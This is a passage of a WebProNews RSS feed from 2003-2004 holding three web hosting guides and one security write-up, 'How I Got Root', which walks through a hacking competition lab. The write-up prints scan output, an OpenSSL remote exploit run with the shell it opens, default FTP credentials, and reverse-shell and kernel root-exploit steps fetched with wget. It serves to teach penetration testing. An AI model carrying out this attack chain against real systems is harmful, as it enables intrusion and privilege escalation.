<p><b>5. Web Statistics</b> &#8211; Analysis of your website visitors plays a key role in the success of your website. Say, your website has been launched and you get NIL Visits or More than 100 Visits per day. Whatever the case may be, you can view the Report using Statistics Application that run in the server backend. </p>
<p><b>6. Bandwidth</b> &#8211; Choose the Hosting Plan that gives enough Bandwidth for your website. Even though you cannot judge at the beginning, as time progresses, you can easily deduct the Bandwidth required. </p>
<p><b>7. PHP &#038; Mysql Support </b>- All the Linux Plans support PHP &#038; Mysql. Make sure you get this free of charge when you buy the hosting plan. Few Hosting Providers may charge extra for MYSQL Database Support &#038; PhpMyAdmin. </p>
<p><b>8. Webmail &#038; SMTP</b> &#8211; Email becomes key part in your life once you launch the website. Check if the Hosts provide with WEBMAIL (mail.yourdomain.com) to check your mails thru a web based interface using Squirrelmail or Horde. Corporate Users prefer downloading mails thru Email Clients such as Eudora or Outlook Express. Only if SMTP or IMAP support is enabled you can use this option. Hence check if SMTP support is provided. </p>
<p><b>9. SPAM ASSASIN </b>- No email user is free from a spam attack. Hence you need to have Spam Filters installed on the server where your website resides. </p>
<p><b>10. IP</b> &#8211; If your website prefers SSL Support (https://) as time grows, makes ure you get a DEDICATED IP. Most of the websites are hosted on shared IPs. Ask your Hosting Provider about the extra charges involved in getting a dedicated IP and SSL Support. Note : For SSL (https://), you need to buy a Digital Certificate. </p>
<p>You can call the above List anything you like. Essentials.Top 10Must- haves..Whatever. But these are the basic ingredients of any linux hosting plan. </p>
<p>Do write to me with your comments and views. My email : siva@aalphanet.com</p>
<p>*Previously published at <a href="http://www.articlecity.com">ArticleCity.com</a></p>
<p>Teeyes Siva heads the Sales Operations @ aalpha NET. He can be reached @ siva@aalphanet.com or 00 91 452 3105858. aalpha NET (http://www.aalphanet.com) &#8211; is Indias leading domain name registration, web hosting service provider. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/the-top-essential-ingredients-of-every-linux-hosting-plan-package-2004-11/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What Every Website Owner Needs to Know</title>
		<link>http://www.webpronews.com/what-every-website-owner-needs-to-know-2004-08</link>
		<comments>http://www.webpronews.com/what-every-website-owner-needs-to-know-2004-08#comments</comments>
		<pubDate>Thu, 19 Aug 2004 14:13:48 +0000</pubDate>
		<dc:creator>Charles Nixon</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[Website]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=11235</guid>
		<description><![CDATA[If you have a website and you didn't design it your self or if your new to the web world there are a few things you will need to have and need to know. Note: this article is  directed more towards the "newbie" webmaster.
]]></description>
			<content:encoded><![CDATA[<p>If you have a website and you didn&#8217;t design it your self or if your new to the web world there are a few things you will need to have and need to know. Note: this article is  directed more towards the &#8220;newbie&#8221; webmaster.</p>
<p><b>For anyone and everyone that owns a website.</b></p>
<p> <b>What do I need to know?</b></p>
<p>When you are looking into maintaining or running a website  there are a few things you will need to know. For starters here are a few things you need to know:</p>
<li>Who you are being hosted by?</li>
<li>   If they offer a control panel of any sort?</li>
<li>If the control panel is easy to navigate?</li>
<li>  If everything is done through this one control panel?</li>
<li>Or if you have a separate panel for email?</li>
<li>How do you access your files?</li>
<li> FTP?</li>
<li>Frontpage?</li>
<li>Browser-based FTP?</li>
<li>Do they offer support?</li>
<li>Can you call them if you cant find something?</li>
<li>Can you go through a FAQ(frequently asked questions)?</li>
<li>Can you contact them via AIM? MSN? Yahoo? or ICQ?</li>
<li> Where is your Domain registered?</li>
<li>Is it registered through your hosting company?</li>
<li>Or through a different company?</li>
<p>There are many more things that you need to know when you own a website. Listed here is just shortened view of important things that you need to know.</p>
<p> If you know of or want to know more about questions for  maintaining and running a website go ahead and email me:  <a href="mailto:Charles@CharlesNixon.com">Charles@CharlesNixon.com</a>    </p>
<p><b>What do I need to have?</b></p>
<p> Now that you know the broad spectrum of frequently asked webmaster questions you need to know what software is  required in order to access the files on your website,  update them, fix them, and delete them.</p>
<p>If your hosting package requires you to use FTP or has the option to use FTP than you need to use a FTP program.</p>
<p><b>What is FTP? </b></p>
<p> FTP stands for File Transfer Protocol and it is a for you  to send and receive files over the internet.</p>
<p><b>Useful FTP Programs:</b></p>
<p><b> Smart FTP</b></p>
<p> This is a very easy to use FTP program. This is the one that I currently use. It allows you to access your website easily and has a very nice and user friendly setup. It is free for 30 days (well it says 30 days but just bugs you  every time you open it after that till you purchase it.  I&#8217;m at 80 days and counting note: I do have the full  version&#8230; just havent got around to re-installing it) <a href="http://www.smartftp.com/">http://www.smartftp.com/</a></p>
<p><b>WS_FTP</b></p>
<p>Great FTP program.. (I used to use it) has a free 30 day trial period also. I disliked the interface. Has a older microsoft windows 98 type look. (well that was when I  used it). It now has a newer look but I havent got  around to checking it out. If you try this one let me know how it goes.</p>
<p><a href="http://wsftp.com/products/ws_ftp/home/index.html">http://wsftp.com/products/ws_ftp/home/index.html</a></p>
<p>After you are able to download and use your files you are  going to need programs to edit them. If you are a code junkie you are most likely going to use notepad the most. But most of us arent code junkies so here are some good  programs for editing html, php, css, and many other files.</p>
<p><b>Useful Editing Programs:</b></p>
<p><b> Macromedia Dreamweaver</b></p>
<p>Awesome program&#8230; Not much more to say. Except that  quality comes with a price. Costs $399. BUT it does have a 30 day trial&#8230; Great program (recommend the newest version mx 2004) Has a load of high quality features. Worth checking out!</p>
<p><a href="http://macromedia.com/software/dreamweaver/">http://macromedia.com/software/dreamweaver/</a></p>
<p><b> Microsoft Frontpage</b></p>
<p>Another great program with high quality features like  dreamweaver. Also worth checking out. (I used to use front page and prefer dreamweaver over it&#8230; but everyone has  different preferences so try them out for their 30 day free trials to see which one is more for you) <a href="http://www.microsoft.com/frontpage/">http://www.microsoft.com/frontpage/</a></p>
<p><b>HTML KIT</b></p>
<p>Of course I had to have a program that was free on the list So here it is! This is a great program and has many  features that frontpage and dreamweaver has and best of  all its free. I use this program all the time when im not on any of my own personal computers.  Note: Its also very small! Around 8-9MB <a href="http://www.chami.com/html-kit/">http://www.chami.com/html-kit/</a></p>
<p>If you know of or want to know more about FTP programs,  code editing programs, or graphics design programs go ahead and email me at: <a href="mailto:Charles@CharlesNixon.com">Charles@CharlesNixon.com</a></p>
<p>Charles Nixon &#8211; Website Designer Driven by Creativity<br />
Building websites to increase sales, and build web presence<br />
Did you start your business to create a website? or to run<br />
your business? With competitive pricing and your project<br />
delivered on time and on budget CharlesNixon.com may be the<br />
web design firm for you!</p>
<p>http://www.CharlesNixon.com/</p>
<p>Charles@CharlesNixon.com</p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/what-every-website-owner-needs-to-know-2004-08/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How I Got Root  A Penetration Testers Diary</title>
		<link>http://www.webpronews.com/how-i-got-root-a-penetration-testers-diary-2004-02</link>
		<comments>http://www.webpronews.com/how-i-got-root-a-penetration-testers-diary-2004-02#comments</comments>
		<pubDate>Wed, 11 Feb 2004 14:19:47 +0000</pubDate>
		<dc:creator>Mati Aharoni</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[Penetration]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=8683</guid>
		<description><![CDATA[This is a possible solution to hacking competition #6, held on SecureIT (15.1.04).
]]></description>
			<content:encoded><![CDATA[<p>This is a possible solution to hacking competition #6, held on SecureIT (15.1.04).</p>
<p>This is actually a replication (lab conditions) of one of my latest penetration tests, which I enjoyed thoroughly. </p>
<p>I would like to thank the anonymous company for allowing me to replicate their network environment, and allowing me to write up this tutorial. Cheers to you all.</p>
<p><b>1.</b>	A quick scan of hacktest.no-ip.com reveals several open ports. The fact that ports 1025 / 1026 / 3372 are open, suggests this machine is not firewalled, and is connected directly to the internet.</p>
<p><center><img src="http://images.ientrymail.com/networknewz/021604figure1.gif"></center></p>
<p><b>2.</b>	It looks like a Windows 2000 box (due to the versions of the WEB and SMTP server). There also seems to be a 3rd party ftp server &#8211; Flash FTP server 2.1. </p>
<p><b>3.</b>	I seem to remember seeing a recent vulnerability in flash ftp server, and a quick google search affirms my suspicions. </p>
<p><center><img src="http://images.ientrymail.com/networknewz/021604figure2.gif"></center></p>
<p><b>4.</b>	With a bit of trial and error, I find that the ftp username and password is ftp / ftp.</p>
<p><b>5.</b>	I log on to the ftp, and check where the ftp home directory lies. I attempt to upload a bindshell (srvcmd.exe) to the default location of the IIS &#8220;scripts&#8221; directory (using file traversal) , in order to be able to execute the bindshell. </p>
<p><center><img src="http://images.ientrymail.com/networknewz/021604figure3.gif"></center></p>
<p><b>6.</b>	Once that&#8217;s done, I execute srvcmd.exe by pointing my web browser to it.</p>
<p><center><img src="http://images.ientrymail.com/networknewz/021604figure4.gif"></center></p>
<p><b>7.</b>	Once executed, the bindshell opens a cmd shell at port 2323. What&#8217;s this? A dual homed machine?</p>
<p><center><img src="http://images.ientrymail.com/networknewz/021604figure5.gif"></center></p>
<p><b>8.</b>	We now have IUSR privileges on the Windows box, and the ability to ftp files to the machine using username ftp / ftp.</p>
<p><b>9.</b>	 We upload out favorite toolkit to the ftp server, including a port scanner, and scan the internal network (192.168.0.0/24). </p>
<p><a name="code"></a><code>scan the internal network (192.168.0.0/24).<br />
C:internetftpserver&gt;<b>sl -bhtz 192.168.0.1-254</b><br />
sl -bhtz 192.168.0.1-254Scan of 254 IPs started at Thu Jan 15 19:28:45 2004<br />
------------------------------------------------------------------------------<br />
<b>192.168.0.1</b><br />
Responded in 0 ms.<br />
0 hops away<br />
Responds with ICMP unreachable: Yes<br />
TCP ports: 25 80 135 139 443 445 1025 1026 3372 3389<br />
UDP ports: 53 67 68 135 137 138 445 500 3456</p>
<p>TCP 25:<br />
[220 5604625cc767428 Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 15 Jan 2004 19:28:54 -0800]</p>
<p>TCP 80:<br />
[HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Fri, 16 Jan 2004 03:28:55 GMT Location: localstart.asp Connection: Keep-Alive Content-Length: 121C]</p>
<p>------------------------------------------------------------------------------<br />
<b>192.168.0.111</b><br />
Responded in 0 ms.<br />
0 hops away<br />
Responds with ICMP unreachable: Yes<br />
TCP ports: 21 22 80 111 389 443 3306 10000 32768<br />
UDP ports: 68 69 111 123 135 137 138 191 192 256 260 407 445 500 514 520 1009 10 24 1027 1028 1030 1033 1034 1035 1037 1041 1058 1060 1091 1352 1645 1646 1812 18 13 1900 1978 2002 2049 2140 2161 2301 2493 2631 2967 3179 3327 3456 4045 4156 42 96 4469 4802 5631 11487 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32778 32779 32780 32781 32782 32783 32784 32785 32786 32787 32788 32789 43981</p>
<p>TCP 21:<br />
[Compiled-in modules: mod_core.c mod_auth.c mod_xfer.c mod_site.c mod_ls.c mod_unixpw.c mod_log.c mod_linuxprivs.c mod_ratio.c mod_readme.c mod_pam.c mod_quot]</p>
<p>TCP 22:[SSH-1.99-OpenSSH_3.1p1]</p>
<p>TCP 80:[HTTP/1.1 200 OK Date: Thu, 15 Jan 2004 19:55:17 GMT Server:Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk) mod_ssl/2.8.7 OpenSSL/0.9.6c PHP/4.1.2]</p>
<p>TCP 443:<br />
[HTTP/1.1 400 Bad Request Date: Thu, 15 Jan 2004 19:55:20 GMT Server: Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk) mod_ssl/2.8.7 OpenSSL/0.9.6c]</p>
<p>TCP 3306:<br />
[D j Host '192.168.0.1' is not allowed to connect to this MySQL server]</p>
<p>TCP 10000:<br />
[HTTP/1.0 400 Bad Request]</p>
<p>------------------------------------------------------------------------------</p>
<p><b>192.168.0.201</b><br />
Responded in 0 ms.<br />
0 hops away<br />
Responds with ICMP unreachable: Yes<br />
TCP ports: 80 139 389<br />
UDP ports: 135 137</p>
<p>TCP 80:<br />
[HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 15 Jan 2004 14:55:18 GMT Connection: Keep-Alive Content-Length: 1270 Content-Type: text/html Set-Cookie:]</p>
<p>------------------------------------------------------------------------------</p>
<p><b>192.168.0.202</b></p>
<p>Responded in 0 ms.<br />
0 hops away<br />
Responds with ICMP unreachable: Yes<br />
TCP ports: 21 110 389<br />
UDP ports:</p>
<p>TCP 21:<br />
[220 box82. FTP server (Version wu-2.6.0(5) Thu Jan 15 14:55:16 EST 2004) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS.]</p>
<p>TCP 110:[+OK POP3 box82 V1999 server ready -ERR Null command -ERR Null command]</p>
<p>------------------------------------------------------------------------------</p>
<p><b>192.168.0.203</b></p>
<p>Responded in 0 ms.<br />
0 hops away<br />
Responds with ICMP unreachable: Yes<br />
TCP ports: 23 389<br />
UDP ports:</p>
<p>------------------------------------------------------------------------------</p>
<p><b>192.168.0.204</b><br />
Responded in 0 ms.<br />
0 hops away<br />
Responds with ICMP unreachable: Yes<br />
TCP ports: 22 389<br />
UDP ports:</p>
<p>TCP 22:<br />
[SSH-1.5-2.40]</p>
<p>------------------------------------------------------------------------------</p>
<p><b>192.168.0.205</b><br />
Responded in 0 ms.<br />
0 hops away<br />
Responds with ICMP unreachable: Yes<br />
TCP ports: 15 389UDP ports:</p>
<p>------------------------------------------------------------------------------</p>
<p>Scan finished at Thu Jan 15 19:29:25 2004ScanLine (TM) 1.01<br />
Copyright (c) Foundstone, Inc. 2002</p>
<p>http://www.foundstone.com</p>
<p>7 IPs and 1869 ports scanned in 0 hours 0 mins 40.87 secs</p>
<p>C:internetftpserver> </code></p>
<p><b>10.</b>	Several machines show up, including their banners. All machines other than 192.168.0.111 are virtual. I was running HoneyD so simulate a larger network. Identifying the real linux box (192.168.0.111 &#8211; Running mandrake 8.2) took a long time, so I&#8217;ll just cut the story short J.</p>
<p><b>11.</b>	I identify a quickly exploitable service on the mandrake machine (openssl), and upload a cygwin compiled version of the exploit (including dll&#8217;s) into the ftp directory. I execute the exploit, and get a shell on the internal mandrake box.</p>
<p><code>C:internetftpserver&gt;<b>dir</b><br />
dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 20AA-0A2D </p>
<p>Directory of C:internetftpserver</p>
<p>01/15/2004  07:32p      &lt;DIR&gt;          .<br />
01/15/2004  07:32p      &lt;DIR&gt;          ..<br />
01/15/2004  07:32p             705,042 cygcrypto-0.9.7.dll<br />
01/15/2004  07:32p             666,528 cygwin1.dll<br />
01/14/2004  07:16p      &lt;DIR&gt;          Logs<br />
01/15/2004  04:48p              59,392 nc.exe<br />
01/15/2004  07:32p             122,368 openssl-too-open.exe<br />
01/15/2004  06:40p              20,480 sl.exe<br />
01/14/2004  11:01p              32,768 srvcmd.exe<br />
               6 File(s)      1,606,578 bytes<br />
               3 Dir(s)   2,579,120,128 bytes free</p>
<p>C:internetftpserver>openssl-too-open.exe -a 0x15 -v 192.168.0.111<br />
openssl-too-open.exe -a 0x15 -v 192.168.0.111<br />
: openssl-too-open : OpenSSL remote exploit<br />
by Solar Eclipse &lt;solareclipse@phreedom.org&gt;</p>
<p>: Opening 30 connections<br />
Establishing SSL connections </p>
<p>-> ssl_connect_host<br />
-> ssl_connect_host<br />
-> ssl_connect_host<br />
-> ssl_connect_host<br />
: Using the OpenSSL info leak to retrieve the addresses<br />
-> send_client_hello<br />
-> get_server_hello<br />
-> send_client_master_key<br />
-> generate_session_keys<br />
-> get_server_verify<br />
-> send_client_finished<br />
-> get_server_finished<br />
ssl0 : 0x811c038<br />
-> send_client_hello<br />
-> get_server_hello<br />
-> send_client_master_key<br />
-> generate_session_keys<br />
-> get_server_verify<br />
-> send_client_finished<br />
-> get_server_finished<br />
ssl1 : 0x811c038<br />
-> send_client_hello<br />
-> get_server_hello<br />
-> send_client_master_key<br />
-> generate_session_keys<br />
-> get_server_verify<br />
-> send_client_finished<br />
-> get_server_finished<br />
ssl2 : 0x811c038</p>
<p>: Sending shellcode<br />
-> send_client_hello<br />
-> get_server_hello<br />
ciphers: 0x811c038   start_addr: 0x811bf78   SHELLCODE_OFS: 208<br />
-> send_client_master_key<br />
-> generate_session_keys<br />
-> get_server_verify<br />
-> send_client_finished<br />
-> get_server_error<br />
Execution of stage1 shellcode succeeded, sending stage2<br />
Spawning shell...</p>
<p>bash: no job control in this shell<br />
<b>bash-2.05$</b> </p>
<p>bash-2.05$ <b>uname -a; id; w;</b>&#8592;[K<br />
Linux box82 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i586 unknown<br />
uid=48(apache) gid=48(apache) groups=48(apache)<br />
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT<br />
root     vc/1     -                 2:31pm  7:23   0.41s  0.36s  -bash<br />
<b>bash-2.05$ </b></code></p>
<p><b>12.</b>	The shell I get is a bit shifty, and echo&#8217;s all my commands twice. I decide to upload a reverse bindshell onto the mandrake box, and make it connect back to my attacking machine. I do this by using wget, and retrieving the rbs.c file from www.secureit.co.il. </p>
<p><center><img src="http://images.ientrymail.com/networknewz/021604figure6.gif"></center></p>
<p><b>13.</b>	Once that&#8217;s done, I compile and execute the reverse bind shell, while netcat is listening on port 4000 on the attacking machine. This gives me a cleaner shell, with &#8220;apache&#8221; user privileges. </p>
<p><center><img src="http://images.ientrymail.com/networknewz/021604figure7.gif"></center></p>
<p><b>14.</b>	Vaguely remembering the output of the uname command (Linux box82 2.4.18-6mdk) I decide to attempt a privilege escalation attack using the Linux kernel ptrace/kmod local root exploit, which should work under several 2.2.x and 2.4.x kernels.</p>
<p><b>15.</b>	I download (wget, again) compile and execute the exploit, hoping for the best.</p>
<p><center><img src="http://images.ientrymail.com/networknewz/021604figure8.gif"></center></p>
<p><b>16.</b>	The exploit was successful, and we now have root privileges on the mandrake box. The .doc file was located in /root/C.doc.</p>
<p>Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP<br />
<br />Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/how-i-got-root-a-penetration-testers-diary-2004-02/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>5 Basic Features You Should Look For  In a Web Hosting Service</title>
		<link>http://www.webpronews.com/basic-features-you-should-look-for-in-a-web-hosting-service-2003-11</link>
		<comments>http://www.webpronews.com/basic-features-you-should-look-for-in-a-web-hosting-service-2003-11#comments</comments>
		<pubDate>Tue, 18 Nov 2003 19:20:05 +0000</pubDate>
		<dc:creator>Radhika Venkata</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Disk]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[Space]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[usage]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=8065</guid>
		<description><![CDATA[Disk space:

Allotment of certain disk space for you means, you are given a folder on web host's server to upload your files.This is same like you create your folder on your own computer.
]]></description>
			<content:encoded><![CDATA[<p>Disk space:</p>
<p>Allotment of certain disk space for you means, you are given a folder on web host&#8217;s server to upload your files.This is same like you create your folder on your own computer.</p>
<p>How much space you are going to need?</p>
<p><b>Ask these questions yourself: </b><br />
How many pages to put up to complete my entire web site?</p>
<p>Am I going to enlarge my web site in the future? How fast?</p>
<p>Am I going to keep &#8216;.exe&#8217; ,&#8217;.zip&#8217;,&#8217;.pdf&#8217; or audio and video files on my server? How many?</p>
<p>Write down answers on a paper.If you say 10 pages web site,No,Slow, No,None- to these questions then 10MB disk space is more than enough for you.</p>
<p>If you come up with opposite answers to any of the questions then you need an alternative plan.</p>
<p>This is what you can do:</p>
<p>Select a web host with starter plans that provide all basic features with 10-25 MB disk space.After few months you can upgrade to next level with increase of disk space.</p>
<p>By this method you won&#8217;t end up with paying $20-25/month from the beginning.</p>
<p><a href="http://www.100megswebhosting.com/ ">http://www.100megswebhosting.com/</a> </p>
<p>This disk space is for your: </p>
<p>- Documents like htm files,images that appear as web pages to the world </p>
<p>- CGI scripts and their data </p>
<p>- Mysql databases if you are using any </p>
<p>- Your server log files like error logs,webloggers(with some web hosts) </p>
<p>- Your email account and email storage(with some web hosts) </p>
<p>So how much you need depends on your web site requirements.If you are going to put up audio presentations or photo galleries then 10 MB starter plans are not for you.You need a good amount of space.</p>
<p><a href="http://www.webmasters-central.com/wd/ds-saving.shtml">Check the tips on saving disk space</a> </p>
<p><b>Band width:</b></p>
<p>Band width is the amount of data transfered between the server and the client. </p>
<p>Data transfer is the amount of band width your web site uses.</p>
<p>Usually for a beginner (in starter plans), you will be offered 2GB of band width.This is more than enough.</p>
<p>How much is one GigaByte? </p>
<p>1 GB = 1024 MegaBytes </p>
<p>1 MB = 1024 KB </p>
<p>1 KB = 1024 Bytes </p>
<p>You have a web site with 12 pages.Each page averages about 10 kb. Daily you will get 100 visitors.On average each visitor surf thru 5 pages.So per day your band width usage is around 5000 kb. (10X100X5).When calculates for 30 days, you will end up with 150000 kb or 150 mb of band width usage.</p>
<p>If you have few more graphics or small downloads on your site this goes a little more high.</p>
<p>Fact about the band width:</p>
<p>There is no such thing like &#8216;unlimitted band width&#8217;.</p>
<p>If you read your web host&#8217;s policy, you might see some rules on using this band width.So always read the terms and conditions before signing up for an account.Most of the web hosts include your email,ftp,http in to your band width usage.For example if you have a mailing list and you sent 20,000 emails every week to your subscribers, all this goes under the usage of band width.</p>
<p>If your control pannel has feature of displaying your band width usage, you can watch how your website using the resources.</p>
<p>Usually the starter plans comes with around 2 GB of traffic. </p>
<p>Some hosts put some restrictions on band width usage:</p>
<p>Some of them they don&#8217;t allow are:</p>
<p>- commercial email advertising </p>
<p>- Big photo galleries </p>
<p>- Installing chat rooms </p>
<p>- using certain amount of system resources like 20% or more.In this case you have upgrade your plan with more disk space or band width </p>
<p><a href="http://www.webmasters-central.com/wd/bw-saving.shtml">Tips on minimising the band width usage </a></p>
<p><b>FTP access:</b></p>
<p>File Transfer Protocol or FTP is the method used to &#8220;upload&#8221; your web site files to your server.</p>
<p>Three types of ftp access:</p>
<p>- One FTP account is alloted.This is for your personal use.If you want to give access to others you have to share your username and password.</p>
<p>- Multiple FTP accounts are allowed.So you can give your members or friends access to your site with their usernames and passwords.Here you can specify which folders they can have access to.</p>
<p>- Anonymous FTP accounts.Here you can give permission to your visitors or whole world to upload and manage certain folders on your server.Most risky&#8230;eh?</p>
<p>Every web host allots minimum of one FTP account.Because that account is for you to upload your files.</p>
<p>You will see some thing like &#8216;unlimited access and 1 FTP account&#8217;. Means you can upload files all 24/7, and you are alloted only one FTP account for yourself.If you have partnership site that should allows your friends to access your server then you need more than one account.Or you can share your user name and password with your friends to give them access.</p>
<p>If you want your web site users to upload files to YOUR server then you need a web host which gives you multiple FTP accounts, so that you can offer them to your visitors.</p>
<p>Some hosts doesn&#8217;t allow you to have anonymous ftp accounts in starter plans.Anonymous ftp has it&#8217;s own pros and cons.You will have a folder like &#8216;public_ftp&#8217; on your server to allow others to login as anonymous and do file transfers.If you are not sure of anonymous ftp it is not advisable to enable it.Because of:</p>
<p>- Security issues:If you keep a folder world read and writable anybody can upload and edit the files in that folder.So be careful before playing with anonymous ftp feature.</p>
<p>- You are responsible for your files and folders not the web host.</p>
<p>- Disk space and data transfer comes under your account.</p>
<p><b>Control Panel:</b></p>
<p>Control panel is a web-based interface that allows you to manage your domain through a web browser. </p>
<p>Most of the control panels are with icons that are easily understandable of their purpose.</p>
<p>With a click of a mouse you can do many things with out knowing any of the html or some other programming languages.</p>
<p>You can do every thing from your control panel like: </p>
<p>- File uploading<br />
- Managing email accounts<br />
- Managing CGI scripts<br />
- Mysql database management<br />
- Cron jobs etc. </p>
<p>Usually you can access your control panel by typing-<br />
http://www.yourdomain.com/menu or you will get the necessary information from your web host.</p>
<p>You will be given a user name and password to login in to your account. Nobody can change your password or access your control panel. Because the password changing can be done after logging in to your control panel.</p>
<p>Always check the control panel demo before choosing a web host.Some of the control panels has account information,server information and available resources.This would be useful in checking the available disk space or used band width etc.</p>
<p><b>Support:</b></p>
<p>You don&#8217;t get any reply for your requests and questions from your host with in 24 hours?</p>
<p>Then change the host!</p>
<p>No&#8230;I am not kidding.Support is essential part of the web hosting service.Especially when you are a novice.</p>
<p>But most of the web hosts provide good amount of support to their account holders.So always give an email asking some doubt about their hosting plans or some thing and see how fast they can reply a non-customer.</p>
<p><a href="http://www.ientry.com/page/newsletters/"><u>Click here</u> <font color="red">if you are interested in signing up for free B2B newsletters!</font></a></p>
<p>Radhika Venkata<br />
Subscribe to &#8216;iNet Marketing Ezine&#8217; which is completely focused on<br />
Internet Marketing. Receive FREE Ebooks with Resale rights!</p>
<p>http://www.webmasters-central.com/subscribe.shtml</p>
<p>FREE Ecourse :: 30 days Solid work out to increase your online profits!<br />
<a href="http://www.ebooks-world.com/ecourse/index.shtml">http://www.ebooks-world.com/ecourse/index.shtml</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/basic-features-you-should-look-for-in-a-web-hosting-service-2003-11/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Page Caching using memcached
Database Caching 1/45 queries in 0.021 seconds using memcached
Object Caching 646/754 objects using memcached

Served from: webpronews.com @ 2012-02-12 19:05:04 -->
